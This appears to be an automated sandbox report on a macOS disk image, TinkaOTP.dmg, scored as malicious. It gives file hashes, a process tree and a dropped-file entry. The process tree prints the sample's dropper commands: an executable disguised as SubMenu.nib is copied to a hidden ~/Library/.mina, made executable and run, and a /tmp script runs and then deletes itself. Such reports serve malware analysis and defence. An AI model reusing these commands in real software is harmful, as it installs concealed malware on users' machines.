Resubmissions

06-05-2023 12:48

230506-p126bahb92 1

06-05-2023 12:30

230506-pptd2ahb52 1

12-06-2021 11:09

210612-nqn9qdfdq2 10

12-06-2021 11:04

210612-h83qfce7ax 10

12-06-2021 10:49

210612-mkbljdyans 10

04-06-2021 11:41

210604-617hnrwhna 10

03-06-2021 22:37

210603-9ndgvgx33n 10

03-06-2021 17:09

210603-gxrvff2tan 10

03-06-2021 16:24

210603-lv4d7lhgcs 10

Analysis

  • max time network
    147s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    03-06-2021 16:24

General

  • Target

    TinkaOTP.dmg

  • Size

    6.2MB

  • MD5

    81f8f0526740b55fe484c42126cd8396

  • SHA1

    fe83d95afce63e935dbe22aef40a164cee34f4e5

  • SHA256

    899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53

  • SHA512

    751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a

Score
10/10

Malware Config

Signatures

Processes

  • /usr/bin/hdiutil
    hdiutil attach /Users/run/TinkaOTP.dmg -shadow
    1⤵
      PID:455
    • /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
      /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid B9634302-AB34-4E28-BA0E-39D0C0B1CAC0
      1⤵
        PID:457
      • /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
        /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid B9634302-AB34-4E28-BA0E-39D0C0B1CAC0 -post-exec 4
        1⤵
          PID:458
        • /usr/bin/hdiutil
          hdiutil info -plist
          1⤵
            PID:466
          • /bin/chmod
            chmod -R 755 /Volumes/TinkaOTP
            1⤵
              PID:467
            • /usr/sbin/sysctl
              sysctl -w "kern.bigmacbundlepath=/Volumes/TinkaOTP/TinkaOTP.app"
              1⤵
                PID:468
              • /bin/sh
                sh -c /tmp/exec
                1⤵
                  PID:469
                • /bin/bash
                  sh -c /tmp/exec
                  1⤵
                    PID:469
                  • /tmp/exec
                    /tmp/exec
                    1⤵
                      PID:469
                    • /bin/bash
                      /bin/sh /tmp/exec
                      1⤵
                        PID:469
                        • /bin/rm
                          rm -- /tmp/exec
                          2⤵
                            PID:472
                          • /usr/bin/sudo
                            sudo -k -S open /Volumes/TinkaOTP/TinkaOTP.app
                            2⤵
                              PID:471
                              • /usr/bin/open
                                open /Volumes/TinkaOTP/TinkaOTP.app
                                3⤵
                                  PID:473
                            • /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
                              /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
                              1⤵
                                PID:475
                              • /bin/bash
                                /bin/bash -c "cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1"
                                1⤵
                                  PID:478
                                  • /bin/cp
                                    cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/run/Library/.mina
                                    2⤵
                                      PID:479
                                    • /bin/chmod
                                      chmod +x /Users/run/Library/.mina
                                      2⤵
                                        PID:480
                                      • /Users/run/Library/.mina
                                        /Users/run/Library/.mina
                                        2⤵
                                          PID:481

                                      Network

                                      MITRE ATT&CK Matrix

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • /Users/run/Library/.mina

                                        MD5

                                        f05437d510287448325bac98a1378de1

                                        SHA1

                                        fa3deb60b8a2eaa29a7dccf14bee6adae81f442f

                                        SHA256

                                        846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6

                                        SHA512

                                        466999585e7b09e729def6e13c719b656ba7ee9ca43ea32c8fb3a6177de81a75caf9bd5eb0c0ac172c2b7fea3c1aa57d10349ff98aac472fe2ffafde8cd30165